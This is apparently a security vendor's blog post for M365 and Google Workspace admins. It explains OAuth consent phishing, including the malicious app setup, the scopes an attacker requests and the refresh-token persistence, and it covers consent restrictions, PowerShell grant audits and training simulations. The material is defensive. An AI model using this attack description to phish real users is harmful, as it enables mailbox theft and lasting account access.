OAuth consent phishing - the attack pattern FIDO2 doesn't block

Blog

OAuth Consent Phishing: The Attack FIDO2 Doesn't Stop

OAuth Consent Phishing: The Attack FIDO2 Doesn't Stop

Most organizations that have moved off legacy MFA to phishing-resistant MFA (FIDO2, passkeys, WebAuthn) discover within the first 90 days that they still have an open phishing channel. That channel is OAuth consent phishing - an attack pattern that routes around the credential ceremony entirely. The user authenticates with passkey, the cryptographic origin-binding works exactly as designed, and then the user grants a malicious app permission to read their mail. No password was stolen. No MFA was bypassed. The attacker has full API-level access to the victim's mailbox until an admin explicitly revokes the OAuth grant.

This post is for the IT director and the M365 / Workspace admin who has rolled out (or is rolling out) phishing-resistant MFA and needs to close the consent-phishing gap that the rollout exposes. It walks through what the attack is, why phishing-resistant MFA doesn't help, what the attacker gets, the configuration changes that close the channel in M365 and Workspace and how to add consent-phishing simulation to a phishing program.

The mechanics of consent phishing

OAuth consent phishing exploits the legitimate OAuth 2.0 authorization flow. The attacker registers an OAuth application with the identity provider - Microsoft Entra, Google, Okta - using a name designed to look benign or familiar ("Microsoft Office" or "Google Productivity Suite" with subtle branding). The app's redirect URI is attacker-controlled.

The attacker then sends a phishing email containing a link to the OAuth authorization URL. The URL is genuine - it's the legitimate identity provider's consent endpoint - but parameterized to request high-impact scopes for the attacker's app. When the victim clicks, the identity provider authenticates them legitimately (passkey, MFA, whatever they have configured) and presents the standard consent screen: "{Attacker App Name} is requesting the following permissions: Read your mail, Send mail as you, Access your files...". The user clicks "Accept." The provider redirects to the attacker's URI with an authorization code. The attacker exchanges the code for an access token + refresh token. They now have API access to the victim's mailbox, files, calendar - whatever scopes were requested.

The user's credential is intact. The user's MFA factor is intact. The OAuth grant is the attack outcome. From the user's perspective, they completed a routine "this app needs permission" workflow they've seen many times.

Why phishing-resistant MFA doesn't help

Phishing-resistant MFA cryptographically binds the authentication challenge to the legitimate origin. The user's WebAuthn authenticator only signs challenges from accounts.google.com or login.microsoftonline.com - a phishing proxy on a different domain cannot complete the ceremony. This defeats AiTM reverse-proxy phishing decisively.

Consent phishing operates after authentication. The user signs in legitimately - WebAuthn ceremony succeeds, the IDP issues a session token, all controls fire correctly. Then the user encounters the consent screen for an OAuth app. Granting consent is a different code path. It doesn't re-invoke the authentication factor; the user clicks "Accept" and the IDP issues an OAuth authorization code to the configured redirect URI.

Phishing-resistant MFA is necessary but not sufficient. MFA-bypass phishing patterns that target the credential ceremony are defeated; consent phishing routes around the ceremony entirely. The defense layer for consent phishing is at the OAuth-policy layer, not the authentication layer.

What the attacker gets

It depends on which OAuth scopes were requested and granted. The high-impact scopes:

  • Mail.Read (M365) / https://www.googleapis.com/auth/gmail.readonly (Workspace) - Read all mailbox content. Exfiltrate communications, target executives' email for follow-on attacks, search for credentials, financial data, M&A discussions.
  • Mail.Send / gmail.send - Send email as the user. The attacker now has internal-phishing pivot capability. Email recipients see the legitimate user as sender; replies route to the attacker.
  • Files.ReadWrite.All / drive - Read and modify all SharePoint/OneDrive/Drive content. Exfiltrate files, plant malicious documents for downstream targeting.
  • offline_access - Refresh token persistence. The attacker's access survives the user changing their password. Revoking only the password does not revoke the OAuth grant.
  • User.Read.All / admin.directory.user.readonly - Full directory read. Reconnaissance for follow-on targeting (find executives, finance staff, IT admins).

The persistence point matters. Most account-takeover incident response playbooks assume password rotation revokes attacker access. With consent phishing, the attacker has API access via OAuth - independent of the password. Standard password rotation does not help. Revocation requires explicit admin action in Entra or Workspace admin to remove the OAuth grant.

Defense in M365

The single highest-leverage control: restrict user consent at Entra. Path: Microsoft Entra admin center > Enterprise Applications > Consent and permissions > User consent settings. The defaults vary by tenant age; modern tenants tend to default to "Allow user consent for apps." Change to:

  • Do not allow user consent - strictest. All OAuth grants require admin approval. Highest friction; requires admin-consent-request workflow to remain operationally viable.
  • Allow user consent for apps from verified publishers, for selected permissions - middle ground. Microsoft-verified publishers (Adobe, DocuSign, Salesforce) can be granted limited scopes by users; everything else requires admin review.

Combine with Application Consent Policies for fine-grained control over which scopes can be granted at user level. Audit existing OAuth grants regularly using the Microsoft Graph PowerShell module:

Get-MgServicePrincipal -Filter "tags/any(t:t eq 'WindowsAzureActiveDirectoryIntegratedApp')" | Select-Object DisplayName, AppId, Tags
Get-MgOauth2PermissionGrant -All | Group-Object ClientId | Sort-Object Count -Descending

Microsoft Defender for Cloud Apps adds OAuth app discovery and risk scoring; recommend enabling for any tenant on the E5/Defender for Cloud Apps SKU. The signal: any new OAuth app receiving Mail.Read, Mail.Send, Files.ReadWrite.All or offline_access without prior admin review is high-priority investigate.

Defense in Workspace

Path: Google Workspace Admin Console > Security > Access and data control > API controls > Manage Third-Party App Access. Configure:

  • Unconfigured third-party apps: set to "Don't trust." Default is "Trust" or "Limited" depending on tenant age. Untrusted means users cannot grant OAuth scopes to the app without admin approval.
  • Restricted Google services: set sensitive scopes (Gmail, Drive, Directory, Admin SDK) to require admin approval. Block all third-party API access for these services; user-level scope grants are admin-only.
  • App Access Control by domain: restrict to apps from approved publishers if your org has a vetted-app-list policy.

Workspace also offers a third-party app block list (manage by domain or app ID) and the unconfigured-app verification workflow (any new OAuth app surfaces as "unconfigured" until admin classifies it). The configuration is on the admin to lock down; the default is permissive.

Building admin-consent approval workflow

Restricting user consent shifts load to admin. If the admin team isn't equipped to handle approvals at scale, the restriction creates ticket volume that pressures rubber-stamping - which functionally undoes the control.

The workflow that makes restrictive consent operationally viable: a self-service portal where users request OAuth apps, listing the app, the requested scopes and the business case. An admin reviews scopes against business need (Mail.Read for a productivity app is suspicious; Calendars.ReadWrite for a scheduling app is reasonable). Approval/deny is logged. The portal is integrated with the IDP so approval automatically grants the consent at the tenant level. This makes "no user consent" a workable default rather than a friction wall.

Adding consent phishing to the simulation program

Most phishing simulation programs cover credential-harvest lures. They do not cover consent-phishing lures. The result: users have no recognition reflex for the consent-screen variant of the attack.

The simulation pattern: an email that looks like a productivity-app install prompt - "Your team has been invited to use Project Tracker - click to install" - with a button that links to a Bait & Phish-managed URL. The URL renders a visual replica of an OAuth consent page (not a real OAuth flow - no actual permissions granted). Track who clicked through to the consent page and who clicked "Accept" on the simulated page. Auto-assign remediation training for both populations - the click-through training covers "is this an unfamiliar app?" recognition; the click-accept training covers "should I be granting these scopes?" awareness.

Run quarterly. The recognition cue users build: "Is this an OAuth consent screen? For an app I recognize? Requesting only the scopes that app needs?" That cue translates directly to real-world resistance against the attack pattern.

Pulling it together

Phishing-resistant MFA closed the AiTM phishing channel. Consent phishing is one of the residual channels it does not close. The defense is at the OAuth-policy layer: restrict user consent at the IDP, build an admin-approval workflow that makes restriction operationally viable, audit OAuth grants on a continuous schedule and add consent-phishing-style simulation to the phishing program.

If you're rolling out phishing-resistant MFA and want to add consent-phishing simulation as the matched layer, start a free trial covering up to 25 users and run a hard-difficulty consent-phishing campaign this month. For full deployment scoping including M365 and Workspace consent-policy review, see pricing or contact us.

Related reading